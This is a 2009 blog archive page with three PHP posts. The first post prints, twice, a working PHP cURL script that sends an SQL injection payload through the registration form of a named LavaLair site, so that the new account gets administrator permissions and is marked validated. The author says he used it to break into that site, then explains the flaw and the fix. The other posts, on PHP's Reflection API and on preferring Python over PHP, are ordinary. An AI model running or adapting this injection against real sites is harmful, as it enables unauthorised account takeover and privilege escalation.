Category: PHP

PHP

LavaLair SQL Injection Vulnerability: Looking Inside

Post author By masnun
Post date October 12, 2009
19 Comments on LavaLair SQL Injection Vulnerability: Looking Inside

Lavalair is the name of a very popular mobile chat community software developed using PHP MySQL and WML front end. I was once a serious mobile web developer and worked with mobile web apps a lot.

A few days ago, a Indian boy asked for some help with a wapdesire clone of LavaLair. His site was getting hacked by some so-called “hackers”. My experience with LavaLair told me it was some sort of nasty SQL Injection. After having a look at the script, I found out a intensive SQL Injection vulnerability in the registration page. I wrote a CLI php script to inject some SQL codes.

Here is the tool I used to crack into the target site:

<?php
class Browser {
function __construct($ua="") {
$this->UserAgent = $ua;
}
public $curl, $count, $data,$UserAgent;
function url($url) { $this->curl = curl_init($url); }
function fields($count) { $this->count = $count; }
function data($data) { $this->data = strtolower($data); }
function send() {
curl_setopt($this->curl, CURLOPT_POST, $this->count);
if(!empty($this->UserAgent)) {
curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
 }
curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($this->curl);
curl_close($this->curl);
return $result;
}

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";
$m = new Browser("Samsung SGH C160");
$m->url("http://kalponik.freehostia.com/web/register.php");
$m->fields(12);
$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

?>

<?php

class Browser {

function __construct($ua="") {

$this->UserAgent = $ua;

}

public $curl, $count, $data,$UserAgent;

function url($url) { $this->curl = curl_init($url); }

function fields($count) { $this->count = $count; }

function data($data) { $this->data = strtolower($data); }

function send() {

curl_setopt($this->curl, CURLOPT_POST, $this->count);

if(!empty($this->UserAgent)) {

curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);

}

curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);

curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($this->curl);

curl_close($this->curl);

return $result;

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";

$m = new Browser("Samsung SGH C160");

$m->url("http://kalponik.freehostia.com/web/register.php");

$m->fields(12);

$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and it’s insert SQLs are in the format:

insert into table_name set column_1='value_1', column_2 ='value_2'

1	insert into table_name set column_1='value_1', column_2 ='value_2'

So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

My suggestion would be to use Insert SQLs in this way:

insert into table_name (column_1,column_2) values ('value_1','value_2')

1	insert into table_name (column_1,column_2) values ('value_1','value_2')

And now a little rant about these so called hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these scrip kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… 😀

PHP

Reflection API in PHP

Post author By masnun
Post date October 11, 2009

The reflection API works in a similar way of Python’s dir() function. The API provides a rich set of classes to reverse engineer classes, methods, parameters and functions.

Suppose, we want to explore and reverse engineer a class, then use the following code:

<?php
Reflection::export(new ReflectionClass("Class_Name"));
?>

<?php

Reflection::export(new ReflectionClass("Class_Name"));

For example:

<?php
Reflection::export(new ReflectionClass("ZipArchive"));
?>

<?php

Reflection::export(new ReflectionClass("ZipArchive"));

Outputs:

Class [ <internal:zip> class ZipArchive ] {

  - Constants [43] {
    Constant [ integer CREATE ] { 1 }
    Constant [ integer EXCL ] { 2 }
    Constant [ integer CHECKCONS ] { 4 }
    Constant [ integer OVERWRITE ] { 8 }
    Constant [ integer FL_NOCASE ] { 1 }
    Constant [ integer FL_NODIR ] { 2 }
    Constant [ integer FL_COMPRESSED ] { 4 }
    Constant [ integer FL_UNCHANGED ] { 8 }
    Constant [ integer CM_DEFAULT ] { -1 }
    Constant [ integer CM_STORE ] { 0 }
    Constant [ integer CM_SHRINK ] { 1 }
    Constant [ integer CM_REDUCE_1 ] { 2 }
    Constant [ integer CM_REDUCE_2 ] { 3 }
    Constant [ integer CM_REDUCE_3 ] { 4 }
    Constant [ integer CM_REDUCE_4 ] { 5 }
    Constant [ integer CM_IMPLODE ] { 6 }
    Constant [ integer CM_DEFLATE ] { 8 }
    Constant [ integer CM_DEFLATE64 ] { 9 }
    Constant [ integer CM_PKWARE_IMPLODE ] { 10 }
    Constant [ integer ER_OK ] { 0 }
    Constant [ integer ER_MULTIDISK ] { 1 }
    Constant [ integer ER_RENAME ] { 2 }
    Constant [ integer ER_CLOSE ] { 3 }
    Constant [ integer ER_SEEK ] { 4 }
    Constant [ integer ER_READ ] { 5 }
    Constant [ integer ER_WRITE ] { 6 }
    Constant [ integer ER_CRC ] { 7 }
    Constant [ integer ER_ZIPCLOSED ] { 8 }
    Constant [ integer ER_NOENT ] { 9 }
    Constant [ integer ER_EXISTS ] { 10 }
    Constant [ integer ER_OPEN ] { 11 }
    Constant [ integer ER_TMPOPEN ] { 12 }
    Constant [ integer ER_ZLIB ] { 13 }
    Constant [ integer ER_MEMORY ] { 14 }
    Constant [ integer ER_CHANGED ] { 15 }
    Constant [ integer ER_COMPNOTSUPP ] { 16 }
    Constant [ integer ER_EOF ] { 17 }
    Constant [ integer ER_INVAL ] { 18 }
    Constant [ integer ER_NOZIP ] { 19 }
    Constant [ integer ER_INTERNAL ] { 20 }
    Constant [ integer ER_INCONS ] { 21 }
    Constant [ integer ER_REMOVE ] { 22 }
    Constant [ integer ER_DELETED ] { 23 }
  }

  - Static properties [0] {
  }

  - Static methods [0] {
  }

  - Properties [0] {
  }

  - Methods [27] {
    Method [ <internal:zip> public method open ] {
    }

    Method [ <internal:zip> public method close ] {
    }

    Method [ <internal:zip> public method addEmptyDir ] {
    }

    Method [ <internal:zip> public method addFromString ] {
    }

    Method [ <internal:zip> public method addFile ] {
    }

    Method [ <internal:zip> public method renameIndex ] {
    }

    Method [ <internal:zip> public method renameName ] {
    }

    Method [ <internal:zip> public method setArchiveComment ] {
    }

    Method [ <internal:zip> public method getArchiveComment ] {
    }

    Method [ <internal:zip> public method setCommentIndex ] {
    }

    Method [ <internal:zip> public method setCommentName ] {
    }

    Method [ <internal:zip> public method getCommentIndex ] {
    }

    Method [ <internal:zip> public method getCommentName ] {
    }

    Method [ <internal:zip> public method deleteIndex ] {
    }

    Method [ <internal:zip> public method deleteName ] {
    }

    Method [ <internal:zip> public method statName ] {
    }

    Method [ <internal:zip> public method statIndex ] {
    }

    Method [ <internal:zip> public method locateName ] {
    }

    Method [ <internal:zip> public method getNameIndex ] {
    }

    Method [ <internal:zip> public method unchangeArchive ] {
    }

    Method [ <internal:zip> public method unchangeAll ] {
    }

    Method [ <internal:zip> public method unchangeIndex ] {
    }

    Method [ <internal:zip> public method unchangeName ] {
    }

    Method [ <internal:zip> public method extractTo ] {
    }

    Method [ <internal:zip> public method getFromName ] {
    }

    Method [ <internal:zip> public method getFromIndex ] {
    }

    Method [ <internal:zip> public method getStream ] {
    }
  }
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

Class [ <internal:zip> class ZipArchive ] {

- Constants [43] {

Constant [ integer CREATE ] { 1 }

Constant [ integer EXCL ] { 2 }

Constant [ integer CHECKCONS ] { 4 }

Constant [ integer OVERWRITE ] { 8 }

Constant [ integer FL_NOCASE ] { 1 }

Constant [ integer FL_NODIR ] { 2 }

Constant [ integer FL_COMPRESSED ] { 4 }

Constant [ integer FL_UNCHANGED ] { 8 }

Constant [ integer CM_DEFAULT ] { -1 }

Constant [ integer CM_STORE ] { 0 }

Constant [ integer CM_SHRINK ] { 1 }

Constant [ integer CM_REDUCE_1 ] { 2 }

Constant [ integer CM_REDUCE_2 ] { 3 }

Constant [ integer CM_REDUCE_3 ] { 4 }

Constant [ integer CM_REDUCE_4 ] { 5 }

Constant [ integer CM_IMPLODE ] { 6 }

Constant [ integer CM_DEFLATE ] { 8 }

Constant [ integer CM_DEFLATE64 ] { 9 }

Constant [ integer CM_PKWARE_IMPLODE ] { 10 }

Constant [ integer ER_OK ] { 0 }

Constant [ integer ER_MULTIDISK ] { 1 }

Constant [ integer ER_RENAME ] { 2 }

Constant [ integer ER_CLOSE ] { 3 }

Constant [ integer ER_SEEK ] { 4 }

Constant [ integer ER_READ ] { 5 }

Constant [ integer ER_WRITE ] { 6 }

Constant [ integer ER_CRC ] { 7 }

Constant [ integer ER_ZIPCLOSED ] { 8 }

Constant [ integer ER_NOENT ] { 9 }

Constant [ integer ER_EXISTS ] { 10 }

Constant [ integer ER_OPEN ] { 11 }

Constant [ integer ER_TMPOPEN ] { 12 }

Constant [ integer ER_ZLIB ] { 13 }

Constant [ integer ER_MEMORY ] { 14 }

Constant [ integer ER_CHANGED ] { 15 }

Constant [ integer ER_COMPNOTSUPP ] { 16 }

Constant [ integer ER_EOF ] { 17 }

Constant [ integer ER_INVAL ] { 18 }

Constant [ integer ER_NOZIP ] { 19 }

Constant [ integer ER_INTERNAL ] { 20 }

Constant [ integer ER_INCONS ] { 21 }

Constant [ integer ER_REMOVE ] { 22 }

Constant [ integer ER_DELETED ] { 23 }

}

- Static properties [0] {

}

- Static methods [0] {

}

- Properties [0] {

}

- Methods [27] {

Method [ <internal:zip> public method open ] {

}

Method [ <internal:zip> public method close ] {

}

Method [ <internal:zip> public method addEmptyDir ] {

}

Method [ <internal:zip> public method addFromString ] {

}

Method [ <internal:zip> public method addFile ] {

}

Method [ <internal:zip> public method renameIndex ] {

}

Method [ <internal:zip> public method renameName ] {

}

Method [ <internal:zip> public method setArchiveComment ] {

}

Method [ <internal:zip> public method getArchiveComment ] {

}

Method [ <internal:zip> public method setCommentIndex ] {

}

Method [ <internal:zip> public method setCommentName ] {

}

Method [ <internal:zip> public method getCommentIndex ] {

}

Method [ <internal:zip> public method getCommentName ] {

}

Method [ <internal:zip> public method deleteIndex ] {

}

Method [ <internal:zip> public method deleteName ] {

}

Method [ <internal:zip> public method statName ] {

}

Method [ <internal:zip> public method statIndex ] {

}

Method [ <internal:zip> public method locateName ] {

}

Method [ <internal:zip> public method getNameIndex ] {

}

Method [ <internal:zip> public method unchangeArchive ] {

}

Method [ <internal:zip> public method unchangeAll ] {

}

Method [ <internal:zip> public method unchangeIndex ] {

}

Method [ <internal:zip> public method unchangeName ] {

}

Method [ <internal:zip> public method extractTo ] {

}

Method [ <internal:zip> public method getFromName ] {

}

Method [ <internal:zip> public method getFromIndex ] {

}

Method [ <internal:zip> public method getStream ] {

}

Cool, isn’t it? I loved it ! Thanks to Hasin Hayder for referring me to this API.

Read more at: http://www.php.net/language.oop5.reflection 😉

PHP Python

Why I like Python more than PHP ?

Post author By masnun
Post date October 10, 2009
1 Comment on Why I like Python more than PHP ?

A friend of mine asked me a few days ago, why I like Python more than PHP given that I am more skilled in PHP than in Python.

Well, here is the answer. I like Python because:

– On my machine, Python is faster than PHP most of the time.

– I have to type less when I am building a decently large app.

– PHP is going to be the language of the future, yeah, but still Python has more features to offer.

– Python has a large collection cool libraries and addtional modules. I did visit PECL repo of PHP. I still prefer Python’s module collection.

– Python has a larger built in module collection.

– Python has a very good interactive shell and many decent IDEs. Even the Gedit I use on my Ubuntu has a python console.

– Debugging is pretty easy. Inspection of objects are easier as well.

– Programs can be converted to bytecode.

– Force indentation makes the code more readable.

– Things are always easier and less time consuming on Python. Just compare the BeautifulSoup with PHP’s SimpleXML and DOM. You’ll get the difference.

– Python is well suited for all sorts of development — desktop apps, web apps or even mobile apps.

And I have many more reasons, but what’s the point writing them in? The simplest answer is Python has won my heart and so I prefer it to PHP. Any objections ?

Recent Posts

Recent Comments

Archives

Categories